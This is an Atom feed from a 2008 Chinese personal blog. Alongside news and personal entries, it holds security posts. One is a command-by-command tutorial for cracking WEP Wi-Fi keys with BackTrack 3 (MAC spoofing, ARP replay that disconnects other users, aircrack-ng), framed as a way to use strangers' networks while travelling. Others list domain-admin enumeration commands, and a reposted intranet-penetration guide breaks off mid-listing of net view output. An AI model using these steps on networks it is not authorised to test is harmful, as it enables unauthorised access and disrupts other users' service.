<?xml version="1.0" encoding="UTF-8"?>
  <feed xmlns="http://www.w3.org/2005/Atom">
  <title type="html"><![CDATA[Kane's Blog[A.D.K]]]></title>
  <subtitle type="html"><![CDATA[-- Bug can at anywh&#101;re，can you find it?]]></subtitle>
  <id>http://iamkane.com/</id>
  <link rel="alternate" type="text/html" href="http://iamkane.com/" /> 
  <link rel="self" type="application/atom+xml" href="http://iamkane.com/atom.asp" /> 
  <generator uri="http://www.pjhome.net/" version="2.8">PJBlog3</generator> 
  <updated>2008-08-09T02:18:31+08:00</updated>

  <entry>
	  <title type="html"><![CDATA[林妙可演唱《歌唱祖国》[08奥运会开幕式]]]></title>
	  <author>
		 <name>Kane</name>
		 <uri>http://iamkane.com/</uri>
		 <email>kaneyau@msn.com</email>
	  </author>
	  <category term="" scheme="http://iamkane.com/default.asp?cateID=6" label="MyFav" /> 
	  <updated>2008-08-09T02:18:31+08:00</updated>
	  <published>2008-08-09T02:18:31+08:00</published>
		  <summary type="html"><![CDATA[<p><br />
<img alt="" src="http://iamkane.com//attachments/month_0808/g20088921135.jpg" /><br />
姓名：林妙可<br />
拼 音：limiaoke<br />
描 述：小公主<br />
生 日：2000年1月1日<br />
现住地： 北京<br />
籍 贯： 北京<br />
民 族： 汉族<br />
身 高：122厘米<br />
体 重：20公斤<br />
年龄：9岁<br />
地 区： 大陆<br />
国 籍： 中国<br />
语 言：普通话<br />
特 长：表演,唱歌,舞蹈,钢琴<br />
职 业：影视演员<br />
经历：2008奥运会开幕式《歌唱祖国》演唱者<br />
&nbsp;</p>
<p>&nbsp;</p>
<p><a href="http://flv1.video.cctv.com/8/7/3/6/6378/125478/32122368.flv">http://flv1.video.cctv.com/8/7/3/6/6378/125478/32122368.flv</a><br />
<embed id="opusplayer" flashvars="VideoID=125478&amp;server=http://video.cctv.com/&amp;star=5" allowscriptaccess="sameDomain" allowfullscreen="true" quality="high" bgcolor="#000000" name="opusplayer" src="http://video.cctv.com/flash/cctv_player.swf" type="application/x-shockwave-flash" width="501" height="431"></embed><br />
<br />
<br />
<br />
&nbsp;</p>]]></summary>
	  <link rel="alternate" type="text/html" href="http://iamkane.com/article.asp?id=233" /> 
	  <id>http://iamkane.com/default.asp?id=233</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[[原创]用BT3破解WIFI WEP加密]]></title>
	  <author>
		 <name>Kane</name>
		 <uri>http://iamkane.com/</uri>
		 <email>kaneyau@msn.com</email>
	  </author>
	  <category term="" scheme="http://iamkane.com/default.asp?cateID=3" label="Security" /> 
	  <updated>2008-07-28T06:36:11+08:00</updated>
	  <published>2008-07-28T06:36:11+08:00</published>
		  <summary type="html"><![CDATA[<p>&nbsp;</p>
<p>下了个BT3(Back Track 3)，上YouTube看了段破解WEP的视频。自己实现了一下，结果真的行了。wifi的WEP 加密真的很脆弱，不过以后看见wifi基本就可以上网囖。哈哈。</p>
<p>&nbsp;</p>
<p>一、试验环境</p>
<p style="margin-left: 40px">1.需要一张支持在linux使用airodump ，aircrack 的无线网卡。网上很多资料，自己去找吧。</p>
<p style="margin-left: 40px">2.下载BT3 ISO 刻盘，然后从光盘启动进入 KDE BT 里面。</p>
<p>二、过程步骤：</p>
<p style="margin-left: 40px">1.在菜单栏的Internet 中找到 wireless assistant 并打开。里面可以看到附近的无线网络。看看有没有加密了网络。这里我只测试了WEP的加密。如果提示无找到网络，会自动关闭。需要从新检查一下你的无线网卡。</p>
<p style="margin-left: 40px">2. 接下来是开第一shell 开始输入命令啦：</p>
<p style="margin-left: 40px">&nbsp;&nbsp;&nbsp;&nbsp; 1）输入 airmon-ng&nbsp; 返回 无线网卡列表，要看清楚哪张网卡哦！我这里是wifi0</p>
<p style="margin-left: 40px">&nbsp;&nbsp;&nbsp;&nbsp; 2）airmon-ng stop wifi0&nbsp;</p>
<p style="margin-left: 40px">&nbsp;&nbsp;&nbsp;&nbsp; 3)&nbsp; ifconfig wif0 down</p>
<p style="margin-left: 40px">&nbsp;&nbsp;&nbsp;&nbsp; 4）macchanger -m 00:11:22:33:44:55 wifi0&nbsp;&nbsp;&nbsp; 修改网卡的mac地址</p>
<p style="margin-left: 40px">&nbsp;&nbsp;&nbsp;&nbsp; 5）airmon-ng start wifi0&nbsp;&nbsp; 启动完成后会再次列出所有的无线网卡。有写网卡会提示继承父级的驱动。估计这里的意思是，BT3自带了破解的驱动吧。呵呵..</p>
<p style="margin-left: 40px">&nbsp;&nbsp;&nbsp;&nbsp; 6）设置网卡ko了，就开始airodump啦！</p>
<p style="margin-left: 40px">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 输入&nbsp; airodump-ng wifi0&nbsp; ，成功后会出现一个列表，而且不断的有pack进出。如果无返回这个列表，就需要改一下，看看刚才上面arimon-ng列出来的网卡。然后换一个网卡来dump。我这里是 airodump-ng ath1. 列表如果出来，就按 ctrl+C 停止。然后找到你要破解的网络的BSSID并且copy下来,还有要看清楚他的channel 和essid.</p>
<p style="margin-left: 40px">&nbsp;&nbsp;&nbsp; 7) airodump-ng -c <u>要破解的channel</u>&nbsp; -w wep123 --bssid <u>粘贴刚刚的BSSID</u>&nbsp;</p>
<p style="margin-left: 40px">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这里的wep123是随便输入的，后面需要用的哦。</p>
<p style="margin-left: 40px">3. 再开一个Shell输入：</p>
<p style="margin-left: 40px">&nbsp;&nbsp; 1） aireplay-ng -1 -0 -a <u>粘贴刚刚的BSSID</u>&nbsp; -h 00:11:22:33:44:55 -e <u>要破解的essid </u>ath1</p>
<p style="margin-left: 40px">&nbsp;&nbsp;&nbsp; 回车后，会返回一段东西里面有success的字样。具体是什么没太留意啦。就直接下一步了。也不知道失败是返回什么了。</p>
<p style="margin-left: 40px">&nbsp; 2） airepaly-ng -3 -b <u>粘贴刚刚的BSSID</u>&nbsp;&nbsp; -h 00:11:22:33:44:55 ath1</p>
<p style="margin-left: 40px">&nbsp;&nbsp; 这里就直接arp了整个wifi网络。在wifi里面的人估计就上不了网了。所以接下来要速度点。如果里面的没人..那我就不知道会怎么样了。哈哈.因为需要截取一定量的数据包才能破解出密码。</p>
<p style="margin-left: 40px">4. 再开一个shell输入：</p>
<p style="margin-left: 40px">&nbsp;&nbsp; aircrack-ng -n 64 0b <u>粘贴刚刚的BSSID</u>&nbsp;&nbsp; wep123_01.cap</p>
<p style="margin-left: 40px">&nbsp;&nbsp; 这里不要这么快按回车，有两个地方需要注意的。第一是wep123_01.cap，需要确认一下名称，去home目录看看是不是这个名字。第二看看第一个shell窗口的数据包是否过W。如果都ko了，就按回车看结果吧。</p>
<p style="margin-left: 40px">key found: 后面这些就是密码啦。</p>
<p>&nbsp;</p>
<p>三. 总结一下</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; WEP真的非常脆弱，但相信国内大多数wifi用的都是WEP啦。特别是家庭里面用的。下次要实现一下WPA 和 WPA-PSK 这两个环境的破解。BT3 是国外一个非常牛B的crack OS，里面集成大量的 hack tools。当出差或者去旅行的时候，最好带上一个网卡和BT3光盘。一定会有所收获的。呵呵..&nbsp;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 另外，前段时间在武汉机场深圳机场都看到有中国电信的wifi网络。中国电信wifi是相对安全的。他不是加密的wifi。而是先让你连进wifi分配了一个公网IP给你。但是当你的数据要出去的时候，他会redirected到一个登陆页面输入帐户密码。所以.... 别想无线城的wifi了。不过估计奥运有外国hacker 想到办法破解到电信这个wifi系统的啦。</p>
<p>&nbsp;</p>
<p>加个IPW2200的方法：<a href="http://backtrack.offensive-security.com/index.php/HCL:Wireless#IPW2200">http://backtrack.offensive-security.com/index.php/HCL:Wireless#IPW2200</a></p>]]></summary>
	  <link rel="alternate" type="text/html" href="http://iamkane.com/article.asp?id=231" /> 
	  <id>http://iamkane.com/default.asp?id=231</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[Get domain controller info ]]></title>
	  <author>
		 <name>Kane</name>
		 <uri>http://iamkane.com/</uri>
		 <email>kaneyau@msn.com</email>
	  </author>
	  <category term="" scheme="http://iamkane.com/default.asp?cateID=3" label="Security" /> 
	  <updated>2008-07-26T10:17:42+08:00</updated>
	  <published>2008-07-26T10:17:42+08:00</published>
		  <summary type="html"><![CDATA[大学的时候玩过下域，但现在都忘记了。 要好好恶补下才得.. 呵呵. <br/><br/><br/>入了域的机器可以通过下面的命令获取域的相关信息。<br/><br/>获取域的用户列表:&nbsp;&nbsp;<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://iamkane.com/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/>net user /domain<br/></div></div><br/><br/>获取域控制器的管理员:<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://iamkane.com/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/>net group &#34;Domain Admins&#34; /domain<br/><br/>net group &#34;Enterprise Admins&#34; /domain<br/></div></div><br/><br/>获取域里面的所有组<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://iamkane.com/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/>net group /domain<br/></div></div><br/><br/><br/>获取所有加入域的计算机名<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://iamkane.com/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/>net group &#34;Domain Computers&#34; /domain<br/></div></div>]]></summary>
	  <link rel="alternate" type="text/html" href="http://iamkane.com/article.asp?id=229" /> 
	  <id>http://iamkane.com/default.asp?id=229</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[马云致信阿里巴巴全体员工号召准备过冬]]></title>
	  <author>
		 <name>Kane</name>
		 <uri>http://iamkane.com/</uri>
		 <email>kaneyau@msn.com</email>
	  </author>
	  <category term="" scheme="http://iamkane.com/default.asp?cateID=9" label="ITNews" /> 
	  <updated>2008-07-24T05:32:17+08:00</updated>
	  <published>2008-07-24T05:32:17+08:00</published>
		  <summary type="html"><![CDATA[新闻来源:新浪科技<br/>7月23日晚间消息，阿里巴巴集团董事局主席马云刚刚发布内部邮件，号召阿里巴巴全体准备“过冬”，以下为该邮件全文：<br/>各位阿里人：<br/><br/>对阿里巴巴B2B的股价走势，我想大家的心情一定很复杂！今天想和大家聊聊我对目前大局形势和未来的一些看法，也许对大家会有一点帮助。<br/><br/>　　大家也许还记得，在二月的员工大会上我说过：冬天要来了，我们要准备过冬！当时很多人不以为然！其实我们的股票在上市后被炒到发行价近3倍的 时候，在一片喝彩的掌声中，背后的乌云和雷声已越来越近。因为任何来得迅猛的激情和狂热，退下去的速度也会同样惊人！我不希望看到大家对股价有缺乏理性的思考。去年在上市的仪式上，我就说过我们将会一如既往，不会因为上市而改变自己的使命感。面对今后的股市，我希望大家忘掉股价的波动，记住客户第一!记住我们对客户，对社会，对同事，对股东和家人的长期承诺。 当这些承诺都兑现时，股票自然会体现你对公司创造的价值。<br/><br/>　　我们对全球经济的基本判断是经济将会出现较大的问题，未来几年经济有可能进入非常的困难时期。我的看法是，整个经济形势不容乐观，接下来的冬天会比大家想象得更长！更寒冷！更复杂！ 我们准备过冬吧！<br/><br/>　　面对冬天我们该做些什么呢？<br/><br/>　　第一，要有过冬的信心和准备！<br/><br/>　　冬天并不可怕！可怕的是我们没有准备！可怕的是我们不知道它有多长，多寒冷！机会面前人人平等，而灾难面前更是人人平等！谁的准备越充分，谁 就越有机会生存下去。强烈的生存欲望和对未来的信心，加上充分的思想和物质准备是过冬的重要保障。阿里集团在经历了上一轮互联网严冬、非典等一系列打击后，我们具备了一定的抗打击能力。去年对上市融资机会的把握，又让我们具备了二十多亿美金的过冬现金储备。集团年初“深挖洞，广积粮，做好做强不做大”的策略已经开始在各子公司得到坚决的实施。我想对严冬的到来，阿里人应该拿出当年的豪情：If not now, When?! If not me,Who?!!( 此时此刻，非我莫属！) 2001年我们对自己说过：Be the last man standing! 即使是跪着我们也要是最后一个倒下！凭今天阿里的实力也许我们自己不会倒下，但是今天的我们肩负着比以往更大的责任，我们不仅仅要让自己不倒下，我们还有责任保护我们的客户——全世界相信并依赖阿里巴巴服务的数千万的中小企业不能倒下！在今天的经济形势下很多企业的生存将面临极大的挑战，帮助他们渡过难关是我们的使命——是“让天下没有难做的生意”在今天最完美的诠释！我们要牢牢记住：如果我们的客户都倒下了，我们同样见不到下一个春天的太阳！<br/><br/>　　第二，要做冬天该做的事！<br/><br/>　　一个伟大的公司绝不仅仅是因为能抓住多少次机会，而是因为能扛过一次又一次的灭顶之灾！ 2002-2003年间，我们抓住了互联网的寒冬大搞阿里企业文化，组织结构和人才培养建设。今天，我们在感谢去年上市给我们带来机会的同时，也要学会感谢今天世界经济调整给我们带来的巨大机遇。阿里巴巴从18人创业到今天超过一万人，我们的文化、组织和人才建设也在快速增长下面临挑战，但也因此得到机遇，让我们这五年轰轰烈烈地经历了组建淘宝网、支付宝公司、收购中国YAHOO、创建阿里软件、阿里妈妈和投资口碑网一直到去年上市。我们希望有几年的休整时间，感谢这个时代又给了我们一次这样的机遇。<br/><br/>　　我们经过深思熟虑，决定基于我们一惯“客户第一，员工第二，股东第三”的原则，<br/><br/>　　明确阿里未来十年的发展目标：<br/><br/>　　1。阿里集团要成为全世界最大的电子商务服务提供商！<br/><br/>　　2。打造全球最佳雇主公司！<br/><br/>　　要实现以上目标首先要抓住这次过冬的机遇！让我们再一次回到商业的基本点——客户第一的原则，把握危险中的一切机遇。一支强大军队的勇气往往 不是诞生在冲锋陷阵之中，而是表现在撤退中的冷静和沉着。一个伟大的公司同样会体现在经济不好的形势下，仍然以乐观积极的心态拥抱变化并在困难中调整、学习和成长。<br/><br/>　　中国市场的巨大潜力和对世界经济的积极影响力将会在未来世界经济体中发挥越来越大的实质性的推动作用，我们庆幸地看到世界各国的领导人比以往 更懂得协同和交流，我们看到全世界在共同面对疾病、海啸、地震、大气变暖等自然灾害上的高度统一，于是我们有理由相信世界各国将一定会在经济发展这个人类社会生存和发展的重要问题上表现出更为积极的努力和智慧。我也坚信这次危机将会使单一依靠美元经济的世界经济发生重大变化，世界经济将会走向更加开放更加多元化！而由电子商务推动的互联网经济将会在这次变革中发挥惊人的作用! “拉动消费,创造就业”必将是我们电子商务在这场变革中的巨大使命和机会。我们坚信电子商务前景光明，并能够真正地帮助我们的中小企业客户改变不利的经济格局。十年以后因为今天的变革，我们将会看到一个不同的世界！<br/><br/>　　各位阿里人, 让我们一起参与和见证这次变革吧！<br/><br/>　　马云]]></summary>
	  <link rel="alternate" type="text/html" href="http://iamkane.com/article.asp?id=228" /> 
	  <id>http://iamkane.com/default.asp?id=228</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[Dos 的VPN 常用命令]]></title>
	  <author>
		 <name>Kane</name>
		 <uri>http://iamkane.com/</uri>
		 <email>kaneyau@msn.com</email>
	  </author>
	  <category term="" scheme="http://iamkane.com/default.asp?cateID=5" label="MyArticle" /> 
	  <updated>2008-07-22T09:02:28+08:00</updated>
	  <published>2008-07-22T09:02:28+08:00</published>
		  <summary type="html"><![CDATA[<p>netsh ras set user administrator permit #允许administrator拨入该VPN   <br />netsh ras set user administrator deny #禁止administrator拨入该VPN    <br />netsh ras show user #查看哪些用户可以拨入VPN    <br />netsh ras ip show config #查看VPN分配IP的方式    <br />netsh ras ip set addrassign method = pool #使用地址池的方式分配IP    <br />netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254</p>]]></summary>
	  <link rel="alternate" type="text/html" href="http://iamkane.com/article.asp?id=227" /> 
	  <id>http://iamkane.com/default.asp?id=227</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[[转]内网渗透---常用手法]]></title>
	  <author>
		 <name>Kane</name>
		 <uri>http://iamkane.com/</uri>
		 <email>kaneyau@msn.com</email>
	  </author>
	  <category term="" scheme="http://iamkane.com/default.asp?cateID=3" label="Security" /> 
	  <updated>2008-07-22T07:26:49+08:00</updated>
	  <published>2008-07-22T07:26:49+08:00</published>
		  <summary type="html"><![CDATA[内网，很多人应该形成了这个概念，很多大型网络的外部网站或是服务器不一定有用，当然外网也是一个突破口。很多时候我们直接从外网入手，随着安全的不断加固，已变得越来越困难。那么黑客通常是怎么进行内网渗透的，内网渗透又是怎样与社会工程学联系起来呢，今天主要描述黑客内网渗透的常用操作手法，关于如何获得内网机器，请查找我以前的一篇文章《内网渗透---如何打开突破口》。<br/> <br/>渗透的过程就是一个信息刺探、利用、思考、突破的过程。首先在我们获得一台内网的机器后应该怎么做，当然是信息刺探。<br/>一．信息刺探<br/>1． 当前机器的人物身份，当前控制的这台机器人物是一个什么样的身份，客服、销售人员还是开发人员，还是管理员。客服会做些什么，会通过什么方式跟其它人联系；开发人员在开发什么，应该会跟管理员联系，也会有一定的外网管理权限和内网测试服务器，这种情况下内网测试服务器是可以搞定的。如果是客服机器或是销售人员机器呢，他一定有整个公司或是网络的联系方式，自己发挥想象去。是管理员机器的话就不用说。<br/>2． 当前网络结构的分析，是域结构，还是划分vlan的结构，大多数大型网络是域结构。一般外网的服务器都是有硬件防火墙的，并且指定内网的某些机器的mac才可以连接。所以我们先看看内网情况：<br/>&nbsp;&nbsp; C:\WINNT\system32&gt;net view<br/>伺服器名稱&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;說明<br/> <br/>-------------------------------------------------------------------------------<br/>\\2007ACC&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\ABS-XP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\ACER-TS250&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; NAS 4BAY SATA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\ACER-TS500&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; NAS 4BAY SATA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\ACER6100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\AKIRA-WU&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; akira-wu&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>\\ALICECHEN&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>\\AMYCHIU&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\ANDY2007&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\ANDYTEST01&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\ANNHUANG&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>\\ANNIEKUO&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\APOLLO&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\APOPO&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\ARTSERVER&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp